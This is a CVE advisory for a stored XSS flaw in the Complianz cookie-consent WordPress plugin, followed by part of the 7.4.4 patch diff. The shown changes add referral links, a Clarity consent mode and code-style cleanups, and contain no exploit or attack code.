CVE-2025-11185: Complianz | GDPR/CCPA Cookie Consent <= 7.4.3 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode (complianz-gdpr)

--- a/complianz-gdpr/class-admin.php
+++ b/complianz-gdpr/class-admin.php
@@ -209,14 +209,14 @@

 			$support_link = defined( 'cmplz_free' )
 				? "https://wordpress.org/support/plugin/complianz-gdpr"
-				: "https://complianz.io/support";
+				: cmplz_get_referral_url( 'articles', 'plugins-page-support', 'https://complianz.io/support' );
 			$faq_link     = '<a target="_blank" href="' . $support_link . '">'
 			                . __( 'Support', 'complianz-gdpr' ) . '</a>';
 			array_unshift( $links, $faq_link );

 			if ( ! defined( 'cmplz_premium' ) ) {
 				$upgrade_link
-					= '<a style="color:#2DAAE1;font-weight:bold" target="_blank" href="https://complianz.io/l/pricing">'
+					= '<a style="color:#2DAAE1;font-weight:bold" target="_blank" href="' . cmplz_get_referral_url( 'menu', 'plugins-page', 'https://complianz.io/l/pricing' ) . '">'
 					  . __( 'Upgrade to premium', 'complianz-gdpr' ) . '</a>';
 				array_unshift( $links, $upgrade_link );
 			}
--- a/complianz-gdpr/complianz-gpdr.php
+++ b/complianz-gdpr/complianz-gpdr.php
@@ -3,7 +3,7 @@
  * Plugin Name: Complianz | GDPR/CCPA Cookie Consent
  * Plugin URI: https://www.wordpress.org/plugins/complianz-gdpr
  * Description: Complianz Privacy Suite for GDPR, CaCPA, DSVGO, AVG with a conditional cookie warning and customized cookie policy
- * Version: 7.4.3
+ * Version: 7.4.4
  * Requires at least: 5.9
  * Requires PHP: 7.4
  * Text Domain: complianz-gdpr
@@ -302,7 +302,7 @@
 			// for auto upgrade functionality.
 			define( 'CMPLZ_PLUGIN_FREE', plugin_basename( __FILE__ ) );
 			$debug = ( defined( 'SCRIPT_DEBUG' ) && SCRIPT_DEBUG ) ? '#' . time() : '';
-			define( 'CMPLZ_VERSION', '7.4.3' . $debug );
+			define( 'CMPLZ_VERSION', '7.4.4' . $debug );
 			define( 'CMPLZ_PLUGIN_FILE', __FILE__ );
 		}

--- a/complianz-gdpr/config/warnings.php
+++ b/complianz-gdpr/config/warnings.php
@@ -217,273 +217,273 @@
 }

 /** End of Dynamic Notifications */
-
-
 function cmplz_load_warning_types() {
-	return apply_filters('cmplz_warning_types' ,array(
-		'phpversion' => array(
-			'warning_condition' => 'NOT cmplz_has_recommended_phpversion',
-			'urgent' => __( 'Your PHP version is lower than the recommended PHP version. Some features are not available. Support for this PHP version will be dropped soon.', 'complianz-gdpr' ),
-			'url' => 'https://complianz.io/php-version/',
-			'plus_one' => true,
-			'include_in_progress' => true,
-		),
-		'migrate_js' => array(
-			'warning_condition'  => 'get_value_enable_migrate_js==yes',
-			'open' => __( 'Migrate.js, which allowed a smooth upgrade to 6.0, has been deprecated.', 'complianz-gdpr' ),
-			'url' => 'https://complianz.io/migrate-js-deprecated/',
-			'admin_notice' => true,
-		),
-		'enable_quebec_region' => array(
-			'warning_condition'  => 'cmplz_requires_quebec_notice',
-			'open' => cmplz_quebec_notice(),
-			'url' => 'https://complianz.io/quebec-bill-64/',
-			'admin_notice' => true,
-			'dismissible' => true,
-		),
-		// 'new_gutenberg_consentarea' => array(
-		// 	'warning_condition'  => 'cmplz_upgraded_to_current_version',
-		// 	'open' => __( 'New: Gutenberg Block with consent capabilities.', 'complianz-gdpr' ),
-		// 	'admin_notice' => false,
-		// 	'plus_one' => true,
-		// 	'url' => 'https://complianz.io/gutenberg-block-consent/'
-		// ),
-
-		'no-dnt' => array(
-			'success_conditions'  => array(
-				'get_value_respect_dnt==yes'
-			),
-			'completed'    => __( 'Do Not Track and Global Privacy Control are respected.', 'complianz-gdpr' ),
-			// 'open' => __( 'Do Not Track and Global Privacy Control are not yet respected.', 'complianz-gdpr' ),
-			'url' => 'https://complianz.io/browser-privacy-controls/',
-		),
-
-		'ajax_fallback' => array(
-			'warning_condition'  =>'get_option_cmplz_ajax_fallback_active',
-			'urgent' => __( "Please check if your REST API is loading correctly. Your site currently is using the slower Ajax fallback method to load the settings.", 'complianz-gdpr' ),
-			'url' => 'https://complianz.io/instructions/how-to-debug-a-blank-settings-page-in-complianz/',
-			'plus_one' => true,
-		),
-
-		'has_formal' => array(
-			'success_conditions'  => array(
-				'NOT document->locale_has_formal_variant',
-			),
-			'open' =>  __( 'You have currently selected an informal language, which will result in informal use of language on the legal documents. If you prefer the formal style, you can activate this in the general settings.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-			'url' =>'https://complianz.io/informal-language-in-legal-documents/'
-
-		),
-		'google-fonts' => array(
-			'plus_one' => true,
-			'warning_condition' => 'banner_loader->show_google_fonts_notice',
-			'success_conditions'  => array(
-			),
-			'open' => __( 'Google Fonts requires your attention.', 'complianz-gdpr' ) ." ". __( 'We have added additional support and recommend reviewing your settings.', 'complianz-gdpr' )." " . cmplz_sprintf( __( 'Please read this %sarticle%s to read our position on self-hosting Google Fonts and Privacy by Design.', 'complianz-gdpr' ),  '<a href="http://complianz.io/self-hosting-google-fonts-for-wordpress/" target="_blank">', '</a>'),
-			'include_in_progress' => true,
-			'url' => 'https://complianz.io/self-hosting-google-fonts-for-wordpress/',
-		),
-
-		'cookies-changed' => array(
-			'plus_one' => true,
-			'warning_condition' => 'scan->cookies_changed',
-			'success_conditions'  => array(
-			),
-			'completed'    => __( 'No cookie changes have been detected.', 'complianz-gdpr' ),
-			'open' => __( 'Cookie changes have been detected.', 'complianz-gdpr' ) . " " . __( 'Please review your cookies for changes.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-		),
-		'no-cookie-scan' => array(
-			'success_conditions'  => array(
-				'banner_loader->get_last_cookie_scan_date',
-			),
-			'completed'    => cmplz_sprintf( __( 'Last site scan completed on %s.', 'complianz-gdpr' ), COMPLIANZ::$banner_loader->get_last_cookie_scan_date() ),
-			'open' => __( 'No site scan has been completed yet.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-			'dismissible' => false,
-		),
-
-		'all-pages-created' => array(
-			'warning_condition' => 'get_option_cmplz_wizard_completed_once',
-			'success_conditions'  => array(
-				'documents_admin->all_required_pages_created',
-			),
-			'completed'    => __( 'All required pages have been generated.', 'complianz-gdpr' ),
-			'open' => __( 'Not all required pages have been generated.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-		),
-
-		'hardening' => array(
-			'warning_condition' => 'admin->no_security_plugin_active',
-			'open' =>  __( "Harden your website and quickly detect vulnerabilities with Really Simple Security", 'complianz-gdpr' ),
-			'include_in_progress' => true,
-			'url' => '#tools/security'
-		),
-
-		'ga-needs-configuring'     => array(
-			'warning_condition' => 'banner_loader->uses_google_analytics',
-			'success_conditions'  => array(
-				'banner_loader->analytics_configured',
-			),
-			'open' => __( 'Google Analytics is being used, but is not configured in Complianz.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-		),
-
-		'gtm-needs-configuring'    => array(
-			'warning_condition' => 'banner_loader->uses_google_tagmanager',
-			'success_conditions'  => array(
-				'banner_loader->tagmanager_configured',
-			),
-			'open' => __( 'Google Tag Manager is being used, but is not configured in Complianz.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-		),
-
-		'matomo-needs-configuring' => array(
-			'warning_condition' => 'banner_loader->uses_matomo',
-			'success_conditions'  => array(
-				'banner_loader->matomo_configured',
-			),
-			'open' => __( 'Matomo is being used, but is not configured in Complianz.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-		),
-		'docs-need-updating'       => array(
-			'success_conditions'  => array(
-				'NOT document->documents_need_updating'
-			),
-			'open' => __( 'Your documents have not been updated in the past 12 months. Run the wizard to check your settings.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-		),
-		'cookies-incomplete'       => array(
-			'warning_condition' => 'NOT banner_loader->use_cdb_api',
-			'success_conditions'  => array(
-				'NOT sync->has_empty_cookie_descriptions',
-			),
-			'open' => __( 'You have cookies with incomplete descriptions.', 'complianz-gdpr' ) . " "
-			          .  __( 'Enable the cookiedatabase.org API for automatic descriptions, or add these manually.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-			'url' => '#wizard/cookie-descriptions'
-		),
-
-		'double-stats' => array(
-			'success_conditions'  => array(
-				'NOT get_option_cmplz_double_stats',
-			),
-			'warning_condition' => 'cmplz_uses_statistics',
-			'open' => __( 'You have a duplicate implementation of your statistics tool on your site.', 'complianz-gdpr' ) .
-			          __( 'After the issue has been resolved, please re-run a scan to clear this message.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-			'dismissible' => true,
-			'url' => 'https://complianz.io/duplicate-implementation-of-analytics/',
-		),
-
-		'console-errors' => array(
-			'warning_condition' => 'banner_loader->site_needs_cookie_warning',
-			'success_conditions'  => array(
-				'NOT cmplz_get_console_errors',
-			),
-			'open' => __( 'JavaScript errors are detected on the front-end of your site. This may break the consent banner functionality.', 'complianz-gdpr' )
-			          . '<br />'.__("Last error in the console:", "complianz-gdpr")
-			          .'<div style="color:red">'
-			          . cmplz_get_console_errors()
-			          .'</div>',
-			'include_in_progress' => true,
-			'url' => 'https://complianz.io/cookie-banner-does-not-appear/',
-		),
-
-		'cookie-banner-enabled' => array(
-			'success_conditions'  => array(
-				'cmplz_cookiebanner_should_load(true)',
-			),
-			'completed' => __( 'Your site requires a consent banner, which has been enabled.', 'complianz-gdpr' ),
-			'urgent' => __( 'Your site is not configured to show a consent banner at the moment.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-			'dismissible' => true,
-			'url' => 'https://complianz.io/cookie-banner-does-not-appear/'
-		),
-
-		'pretty-permalinks-error' => array(
-			'success_conditions'  => array(
-				'get_option_permalink_structure',
-			),
-			'plus_one' => true,
-			'urgent' => __( 'Pretty permalinks are not enabled on your site. This can cause issues with the REST API, used by Complianz.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-			'dismissible' => false,
-			'url' => admin_url('options-permalink.php'),
-		),
-		'uploads-folder-writable' => array(
-			'success_conditions'  => array(
-				'cmplz_uploads_folder_writable',
-			),
-			'plus_one' => true,
-			'urgent' => __( 'Your uploads folder is not writable. Complianz needs this folder to save the consent banner CSS.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-			'dismissible' => false,
-			'url' => 'https://complianz.io/folder-permissions/'
-		),
-		'custom-google-maps' => array(
-			'warning_condition' => 'cmplz_uses_google_maps',
-			'success_conditions'  => array(
-				'cmplz_google_maps_integration_enabled',
-			),
-			'plus_one' => false,
-			'open' => __( 'We see you have enabled Google Maps as a service, but we can't find an integration. You can integrate manually if needed.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-			'url' => 'https://complianz.io/custom-google-maps-integration/',
-		),
-
-		'other-cookie-plugins' => array(
-			'warning_condition'  => 'cmplz_detected_cookie_plugin',
-			'plus_one' => true,
-			'urgent' => cmplz_sprintf(__( 'We have detected the %s plugin on your website.', 'complianz-gdpr' ),cmplz_detected_cookie_plugin(true)).' '.__( 'As Complianz handles all the functionality this plugin provides, you should disable this plugin to prevent unexpected behaviour.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-			'dismissible' => false,
-		),
-
-		'advertising-enabled' => array(
-			'warning_condition' => 'get_value_uses_ad_cookies==yes',
-			'premium' => __( 'Are you showing ads on your site? Consider implementing TCF.', 'complianz-gdpr' ),
-			'include_in_progress' => false,
-			'dismissible' => false,
-			'url' => 'https://complianz.io/implementing-tcf-on-your-website/',
-		),
-
-		'sync-privacy-statement' => array(
-			'premium' => __( 'Create a Privacy Statement and other Legal Documents with Complianz.', 'complianz-gdpr' ),
-			'include_in_progress' => false,
-			'dismissible' => false,
-			'url' => 'https://complianz.io/pricing/?src=cmplz-plugin',
-		),
+	$warnings = apply_filters(
+		'cmplz_warning_types',
+		array(
+			'phpversion'                     => array(
+				'warning_condition'   => 'NOT cmplz_has_recommended_phpversion',
+				'urgent'              => __( 'Your PHP version is lower than the recommended PHP version. Some features are not available. Support for this PHP version will be dropped soon.', 'complianz-gdpr' ),
+				'url'                 => 'https://complianz.io/php-version/',
+				'plus_one'            => true,
+				'include_in_progress' => true,
+			),
+			'migrate_js'                     => array(
+				'warning_condition' => 'get_value_enable_migrate_js==yes',
+				'open'              => __( 'Migrate.js, which allowed a smooth upgrade to 6.0, has been deprecated.', 'complianz-gdpr' ),
+				'url'               => 'https://complianz.io/migrate-js-deprecated/',
+				'admin_notice'      => true,
+			),
+			'enable_quebec_region'           => array(
+				'warning_condition' => 'cmplz_requires_quebec_notice',
+				'open'              => cmplz_quebec_notice(),
+				'url'               => 'https://complianz.io/quebec-bill-64/',
+				'admin_notice'      => true,
+				'dismissible'       => true,
+			),
+			'no-dnt'                         => array(
+				'success_conditions' => array(
+					'get_value_respect_dnt==yes',
+				),
+				'completed'          => __( 'Do Not Track and Global Privacy Control are respected.', 'complianz-gdpr' ),
+				'url'                => 'https://complianz.io/browser-privacy-controls/',
+			),
+			'ajax_fallback'                  => array(
+				'warning_condition' => 'get_option_cmplz_ajax_fallback_active',
+				'urgent'            => __( 'Please check if your REST API is loading correctly. Your site currently is using the slower Ajax fallback method to load the settings.', 'complianz-gdpr' ),
+				'url'               => 'https://complianz.io/instructions/how-to-debug-a-blank-settings-page-in-complianz/',
+				'plus_one'          => true,
+			),
+			'has_formal'                     => array(
+				'success_conditions'  => array(
+					'NOT document->locale_has_formal_variant',
+				),
+				'open'                => __( 'You have currently selected an informal language, which will result in informal use of language on the legal documents. If you prefer the formal style, you can activate this in the general settings.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+				'url'                 => 'https://complianz.io/informal-language-in-legal-documents/',
+
+			),
+			'google-fonts'                   => array(
+				'plus_one'            => true,
+				'warning_condition'   => 'banner_loader->show_google_fonts_notice',
+				'success_conditions'  => array(),
+				// translators: %s is a placeholder for the anchor link.
+				'open'                => __( 'Google Fonts requires your attention.', 'complianz-gdpr' ) . ' ' . __( 'We have added additional support and recommend reviewing your settings.', 'complianz-gdpr' ) . ' ' . cmplz_sprintf( __( 'Please read this %1$sarticle%2$s to read our position on self-hosting Google Fonts and Privacy by Design.', 'complianz-gdpr' ), '<a href="https://complianz.io/self-hosting-google-fonts-for-wordpress/" target="_blank">', '</a>' ),
+				'include_in_progress' => true,
+				'url'                 => 'https://complianz.io/self-hosting-google-fonts-for-wordpress/',
+			),
+			'cookies-changed'                => array(
+				'plus_one'            => true,
+				'warning_condition'   => 'scan->cookies_changed',
+				'success_conditions'  => array(),
+				'completed'           => __( 'No cookie changes have been detected.', 'complianz-gdpr' ),
+				'open'                => __( 'Cookie changes have been detected.', 'complianz-gdpr' ) . ' ' . __( 'Please review your cookies for changes.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+			),
+			'no-cookie-scan'                 => array(
+				'success_conditions'  => array(
+					'banner_loader->get_last_cookie_scan_date',
+				),
+				// translators: %s is a placeholder for the last scan completed date.
+				'completed'           => cmplz_sprintf( __( 'Last site scan completed on %s.', 'complianz-gdpr' ), COMPLIANZ::$banner_loader->get_last_cookie_scan_date() ),
+				'open'                => __( 'No site scan has been completed yet.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+				'dismissible'         => false,
+			),
+			'all-pages-created'              => array(
+				'warning_condition'   => 'get_option_cmplz_wizard_completed_once',
+				'success_conditions'  => array(
+					'documents_admin->all_required_pages_created',
+				),
+				'completed'           => __( 'All required pages have been generated.', 'complianz-gdpr' ),
+				'open'                => __( 'Not all required pages have been generated.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+			),
+			'hardening'                      => array(
+				'warning_condition'   => 'admin->no_security_plugin_active',
+				'open'                => __( 'Harden your website and quickly detect vulnerabilities with Really Simple Security', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+				'url'                 => '#tools/security',
+			),
+			'ga-needs-configuring'           => array(
+				'warning_condition'   => 'banner_loader->uses_google_analytics',
+				'success_conditions'  => array(
+					'banner_loader->analytics_configured',
+				),
+				'open'                => __( 'Google Analytics is being used, but is not configured in Complianz.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+			),
+			'gtm-needs-configuring'          => array(
+				'warning_condition'   => 'banner_loader->uses_google_tagmanager',
+				'success_conditions'  => array(
+					'banner_loader->tagmanager_configured',
+				),
+				'open'                => __( 'Google Tag Manager is being used, but is not configured in Complianz.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+			),
+			'matomo-needs-configuring'       => array(
+				'warning_condition'   => 'banner_loader->uses_matomo',
+				'success_conditions'  => array(
+					'banner_loader->matomo_configured',
+				),
+				'open'                => __( 'Matomo is being used, but is not configured in Complianz.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+			),
+			'docs-need-updating'             => array(
+				'success_conditions'  => array(
+					'NOT document->documents_need_updating',
+				),
+				'open'                => __( 'Your documents have not been updated in the past 12 months. Run the wizard to check your settings.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+			),
+			'cookies-incomplete'             => array(
+				'warning_condition'   => 'NOT banner_loader->use_cdb_api',
+				'success_conditions'  => array(
+					'NOT sync->has_empty_cookie_descriptions',
+				),
+				'open'                => __( 'You have cookies with incomplete descriptions.', 'complianz-gdpr' ) . ' '
+							. __( 'Enable the cookiedatabase.org API for automatic descriptions, or add these manually.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+				'url'                 => '#wizard/cookie-descriptions',
+			),
+			'double-stats'                   => array(
+				'success_conditions'  => array(
+					'NOT get_option_cmplz_double_stats',
+				),
+				'warning_condition'   => 'cmplz_uses_statistics',
+				'open'                => __( 'You have a duplicate implementation of your statistics tool on your site.', 'complianz-gdpr' ) .
+							__( 'After the issue has been resolved, please re-run a scan to clear this message.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+				'dismissible'         => true,
+				'url'                 => 'https://complianz.io/duplicate-implementation-of-analytics/',
+			),
+			'console-errors'                 => array(
+				'warning_condition'   => 'banner_loader->site_needs_cookie_warning',
+				'success_conditions'  => array(
+					'NOT cmplz_get_console_errors',
+				),
+				'open'                => __( 'JavaScript errors are detected on the front-end of your site. This may break the consent banner functionality.', 'complianz-gdpr' )
+							. '<br />' . __( 'Last error in the console:', 'complianz-gdpr' )
+							. '<div style="color:red">'
+							. cmplz_get_console_errors()
+							. '</div>',
+				'include_in_progress' => true,
+				'url'                 => 'https://complianz.io/cookie-banner-does-not-appear/',
+			),
+			'cookie-banner-enabled'          => array(
+				'success_conditions'  => array(
+					'cmplz_cookiebanner_should_load(true)',
+				),
+				'completed'           => __( 'Your site requires a consent banner, which has been enabled.', 'complianz-gdpr' ),
+				'urgent'              => __( 'Your site is not configured to show a consent banner at the moment.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+				'dismissible'         => true,
+				'url'                 => 'https://complianz.io/cookie-banner-does-not-appear/',
+			),
+			'pretty-permalinks-error'        => array(
+				'success_conditions'  => array(
+					'get_option_permalink_structure',
+				),
+				'plus_one'            => true,
+				'urgent'              => __( 'Pretty permalinks are not enabled on your site. This can cause issues with the REST API, used by Complianz.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+				'dismissible'         => false,
+				'url'                 => admin_url( 'options-permalink.php' ),
+			),
+			'uploads-folder-writable'        => array(
+				'success_conditions'  => array(
+					'cmplz_uploads_folder_writable',
+				),
+				'plus_one'            => true,
+				'urgent'              => __( 'Your uploads folder is not writable. Complianz needs this folder to save the consent banner CSS.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+				'dismissible'         => false,
+				'url'                 => 'https://complianz.io/folder-permissions/',
+			),
+			'custom-google-maps'             => array(
+				'warning_condition'   => 'cmplz_uses_google_maps',
+				'success_conditions'  => array(
+					'cmplz_google_maps_integration_enabled',
+				),
+				'plus_one'            => false,
+				'open'                => __( 'We see you have enabled Google Maps as a service, but we can't find an integration. You can integrate manually if needed.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+				'url'                 => 'https://complianz.io/custom-google-maps-implementation/',
+			),
+			'other-cookie-plugins'           => array(
+				'warning_condition'   => 'cmplz_detected_cookie_plugin',
+				'plus_one'            => true,
+				// translators: %s is a placeholder for the compliance detected plugin name.
+				'urgent'              => cmplz_sprintf( __( 'We have detected the %s plugin on your website.', 'complianz-gdpr' ), cmplz_detected_cookie_plugin( true ) ) . ' ' . __( 'As Complianz handles all the functionality this plugin provides, you should disable this plugin to prevent unexpected behaviour.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+				'dismissible'         => false,
+			),
+			'advertising-enabled'            => array(
+				'warning_condition'   => 'get_value_uses_ad_cookies==yes',
+				'premium'             => __( 'Are you showing ads on your site? Consider implementing TCF.', 'complianz-gdpr' ),
+				'include_in_progress' => false,
+				'dismissible'         => false,
+				'url'                 => 'https://complianz.io/implementing-tcf-on-your-website/',
+			),
+			'sync-privacy-statement'         => array(
+				'premium'             => __( 'Create a Privacy Statement and other Legal Documents with Complianz.', 'complianz-gdpr' ),
+				'include_in_progress' => false,
+				'dismissible'         => false,
+				'url'                 => 'https://complianz.io/pricing/',
+			),
+			'ecommerce-legal'                => array(
+				'warning_condition'   => 'cmplz_ecommerce_legal',
+				'premium'             => __( 'Legal compliance for webshops.', 'complianz-gdpr' ),
+				'include_in_progress' => false,
+				'dismissible'         => false,
+				'url'                 => 'https://complianz.io/legal-compliance-for-ecommerce/',
+			),
+			'configure-tag-manager'          => array(
+				'warning_condition'   => 'cmplz_uses_google_tagmanager_or_analytics',
+				'premium'             => __( 'Learn more about Google Consent Mode V2.', 'complianz-gdpr' ),
+				'include_in_progress' => false,
+				'dismissible'         => false,
+				'url'                 => 'https://complianz.io/consent-mode-for-7-0/',
+			),
+			'targeting-multiple-regions'     => array(
+				'warning_condition'   => 'cmplz_targeting_multiple_regions',
+				'premium'             => __( 'Are you targeting multiple regions?', 'complianz-gdpr' ),
+				'include_in_progress' => false,
+				'dismissible'         => false,
+				'url'                 => 'https://complianz.io/what-regions-do-i-target/',
+			),
+			'textdomain-just-in-time-notice' => array(
+				'dismissible'         => true,
+				'open'                => __( 'You might see a notice about Complianz when debugging your WordPress website. Although not a breaking issue, pleasee know we're attending to this issue.', 'complianz-gdpr' ),
+				'warning_condition'   => ( defined( 'WP_DEBUG' ) && WP_DEBUG ) ? '_true_' : '_false_',
+				'include_in_progress' => false,
+				'url'                 => 'https://complianz.io/about-function-_load_textdomain_just_in_time-was-called-incorrectly/',
+			),
+			'clarity-consent-mode'           => array(
+				'plus_one'          => true,
+				'dismissable'       => true,
+				'warning_condition' => 'get_value_compile_statistics==clarity',
+				'open'              => __( 'Clarity Consent Mode V2 is now available. Please enable it in the wizard.', 'complianz-gdpr' ),
+				'url'               => '#wizard/statistics-configuration',
+			),
+		)
+	);

-		'ecommerce-legal' => array(
-			'warning_condition' => 'cmplz_ecommerce_legal',
-			'premium' => __( 'Legal compliance for webshops.', 'complianz-gdpr' ),
-			'include_in_progress' => false,
-			'dismissible' => false,
-			'url' => 'https://complianz.io/legal-compliance-for-ecommerce/',
-		),
+	return cmplz_add_referral_to_warnings( $warnings );
+}

-		'configure-tag-manager' => array(
-			'warning_condition' => 'cmplz_uses_google_tagmanager_or_analytics',
-			'premium' => __( 'Learn more about Google Consent Mode V2.', 'complianz-gdpr' ),
-			'include_in_progress' => false,
-			'dismissible' => false,
-			'url' => 'https://complianz.io/consent-mode-for-7-0/'
-		),
+/**
+ * Add referral parameters to premium field upgrade links
+ *
+ * @param array $fields Fields array.
+ * @return array Modified fields with referral parameters.
+ */
+function cmplz_add_referral_to_warnings( $fields ) {
+	foreach ( $fields as $key => &$field ) {
+		if ( isset( $field['url'] ) && strpos( $field['url'], 'complianz.io' ) !== false ) {
+			$field['url'] = cmplz_get_referral_url( 'warnings', $key, $field['url'] );
+		}
+	}

-		'targeting-multiple-regions' => array(
-			'warning_condition' => 'cmplz_targeting_multiple_regions',
-			'premium' => __( 'Are you targeting multiple regions?', 'complianz-gdpr' ),
-			'include_in_progress' => false,
-			'dismissible' => false,
-			'url' => 'https://complianz.io/what-regions-do-i-target/',
-		),
-		'textdomain-just-in-time-notice' => array(
-			'dismissible' => true,
-			'open' => __( 'You might see a notice about Complianz when debugging your WordPress website. Although not a breaking issue, pleasee know we're attending to this issue.', 'complianz-gdpr' ),
-			'warning_condition' => (defined('WP_DEBUG') && WP_DEBUG) ? '_true_' : '_false_',
-			'include_in_progress' => false,
-			'url' => 'https://complianz.io/doing-it-wrong-notice',
-		)
-	) );
+	return $fields;
 }
--- a/complianz-gdpr/cookiebanner/class-banner-loader.php
+++ b/complianz-gdpr/cookiebanner/class-banner-loader.php
@@ -474,7 +474,8 @@
 			//if a cookie warning is needed for the stats we don't add a native class, so it will be disabled by the cookie blocker by default
 			$category        = 'statistics';
 			$uses_tagmanager = cmplz_get_option( 'compile_statistics' ) === 'google-tag-manager' ? true : false;
-			$matomo          = cmplz_get_option( 'compile_statistics' ) === 'matomo' ? true : false;
+            $matomo          = cmplz_get_option( 'compile_statistics' ) === 'matomo' ? true : false;
+            $clarity          = cmplz_get_option( 'compile_statistics' ) === 'clarity' ? true : false;

 			//without tag manager, set as functional if no cookie warning required for stats
 			if ( ! $uses_tagmanager && ! $this->cookie_warning_required_stats() ) {
@@ -490,6 +491,10 @@
 				$category = 'functional';
 			}

+            if ( $clarity && cmplz_get_option( 'clarity_consent_mode' ) === 'yes' ) {
+                $category = 'functional';
+            }
+
 			/*
 			 * Run Tag Manager or gtag by default if consent mode is enabled
 			 */
@@ -662,8 +667,8 @@
 				$script = cmplz_get_template( 'statistics/matomo-tag-manager.js' );
 				$script = str_replace( '{container_id}', esc_attr( cmplz_get_option( 'matomo_container_id' ) ), $script );
 				$script = str_replace( '{matomo_url}', esc_url_raw( trailingslashit( cmplz_get_option( 'matomo_tag_url' ) ) ), $script );
-			}
-			echo apply_filters( 'cmplz_script_filter', $script );
+            }
+            echo apply_filters( 'cmplz_script_filter', $script );

 		}

@@ -717,8 +722,11 @@
 				$script = cmplz_get_template( 'statistics/clicky.js' );
 				$script = str_replace( '{site_ID}', esc_attr( cmplz_get_option( 'clicky_site_id' ) ), $script );
 			} elseif ( $statistics === 'clarity' ) {
-				$script = cmplz_get_template( 'statistics/clarity.js' );
-				$script = str_replace( '{site_ID}', esc_attr( cmplz_get_option( 'clarity_id' ) ), $script );
+                $is_consent_for_anonymous_stats = cmplz_get_option( 'consent_for_anonymous_stats' ) === 'yes';
+                $is_clarity_consent_mode = cmplz_get_option( 'clarity_consent_mode' ) === 'yes';
+                $clarity_script = $is_clarity_consent_mode && $is_consent_for_anonymous_stats ? '-consent-mode' : '';
+                $script = cmplz_get_template("statistics/clarity$clarity_script.js");
+                $script = str_replace('{site_ID}', esc_attr(cmplz_get_option('clarity_id')), $script);
 			} elseif ( $statistics === 'yandex' ) {
 				$script         = cmplz_get_template( 'statistics/yandex.js' );
 				$data_layer     = cmplz_get_option( 'yandex_ecommerce' ) === 'yes';
@@ -1438,7 +1446,7 @@
 			$tagmanager                                = $statistics === 'google-tag-manager';
 			$matomo                                    = $statistics === 'matomo';
 			$google_analytics                          = $statistics === 'google-analytics';
-			$clicky                                    = $statistics === 'clicky';
+            $clicky                                    = $statistics === 'clicky';
 			$accepted_google_data_processing_agreement = false;
 			$ip_anonymous                              = false;
 			$no_sharing                                = false;
--- a/complianz-gdpr/cookiebanner/settings.php
+++ b/complianz-gdpr/cookiebanner/settings.php
@@ -1,28 +1,35 @@
 <?php
-defined( 'ABSPATH' ) or die( "you do not have access to this page!" );
+/**
+ * Cookie banner settings configuration
+ *
+ * @package COMPLIANZ
+ */
+
+defined( 'ABSPATH' ) || die( 'you do not have access to this page!' );

 /**
  * Currently only in use for TCF banner resets
+ *
  * @return array
  */
 function cmplz_banner_color_schemes() {
 	$schemes = array(
-		'tcf'       => array(
-			'colorpalette_background' => array(
+		'tcf' => array(
+			'colorpalette_background'      => array(
 				'color'  => '#ffffff',
 				'border' => '#333333',
 			),
-			'colorpalette_text'       => array(
+			'colorpalette_text'            => array(
 				'color'     => '#222222',
 				'hyperlink' => '#1E73BE',
 			),
-			'colorpalette_toggles'    => array(
+			'colorpalette_toggles'         => array(
 				'background' => '#61CE71',
 				'bullet'     => '#ffffff',
 				'inactive'   => '#f8be2e',
 			),

-			'colorpalette_button_accept' => array(
+			'colorpalette_button_accept'   => array(
 				'background' => '#333333',
 				'border'     => '#333333',
 				'text'       => '#ffffff',
@@ -44,6 +51,11 @@
 	return $schemes;
 }

+/**
+ * Get banner color scheme options.
+ *
+ * @return array
+ */
 function cmplz_get_banner_color_scheme_options() {
 	$schemes = cmplz_banner_color_schemes();
 	$schemes = array_keys( $schemes );
@@ -55,12 +67,19 @@
 	return $options;
 }

-add_filter( 'cmplz_field', 'cmplz_update_banner_text',10,2 );
-function cmplz_update_banner_text($field, $field_id){
-	if ( ($field_id=== 'message_optin' || $field_id === 'message_optout')
-	     && cmplz_get_option( 'uses_ad_cookies_personalized' ) === 'yes' ){
-		$banner_text = __( "We use technologies like cookies to store and/or access device information. We do this to improve browsing experience and to show (non-) personalized ads. Consenting to these technologies will allow us to process data such as browsing behavior or unique IDs on this site. Not consenting or withdrawing consent, may adversely affect certain features and functions.", 'complianz-gdpr' );
-		$field['default'] = $banner_text;
+add_filter( 'cmplz_field', 'cmplz_update_banner_text', 10, 2 );
+/**
+ * Update banner text based on ad cookies settings.
+ *
+ * @param array  $field    Field configuration.
+ * @param string $field_id Field identifier.
+ * @return array
+ */
+function cmplz_update_banner_text( $field, $field_id ) {
+	if ( ( 'message_optin' === $field_id || 'message_optout' === $field_id )
+		&& 'yes' === cmplz_get_option( 'uses_ad_cookies_personalized' ) ) {
